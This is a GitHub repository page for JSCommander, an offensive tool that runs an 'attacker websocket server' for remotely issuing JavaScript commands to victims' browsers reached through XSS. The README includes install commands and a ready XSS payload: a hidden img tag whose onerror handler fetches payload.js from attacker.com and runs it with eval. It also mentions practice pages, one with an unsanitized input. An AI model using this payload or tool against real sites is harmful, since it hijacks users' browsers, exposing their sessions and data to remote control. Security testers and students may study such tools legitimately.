Skip to content
/ JSCommander Public

Remotely send JS to execute on clients that connect to your attacker websocket server via XSS.

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

intrudir/JSCommander

BranchesTags

Repository files navigation

JSCommander

Issue JS commands remotely when clients connect to your attacker websocket server

Inspired by https://www.nullpt.rs/hacking-gta-servers-using-web-exploitation

Install

python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt

Usage

Run the server

python3 JSCommnder-server.py

Control panel is only accessible from localhost on the machine you run me on. Available at http://localhost:8080/control_panel.html

You can use XSS payloads to connect to the websocket server. i.e:

<img src="#" onerror='fetch(`http://attacker.com:8081/payload.js`).then(res=>res.text().then(r=>eval(r)))' style="display:none" />

There are 2 testing HTML files to play with.

  • test_client.html simply connects to the webocket server upon opening it in your browser.
  • test_client2.html has an unsanitized input for practicing with XSS payloads.

About

Remotely send JS to execute on clients that connect to your attacker websocket server via XSS.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages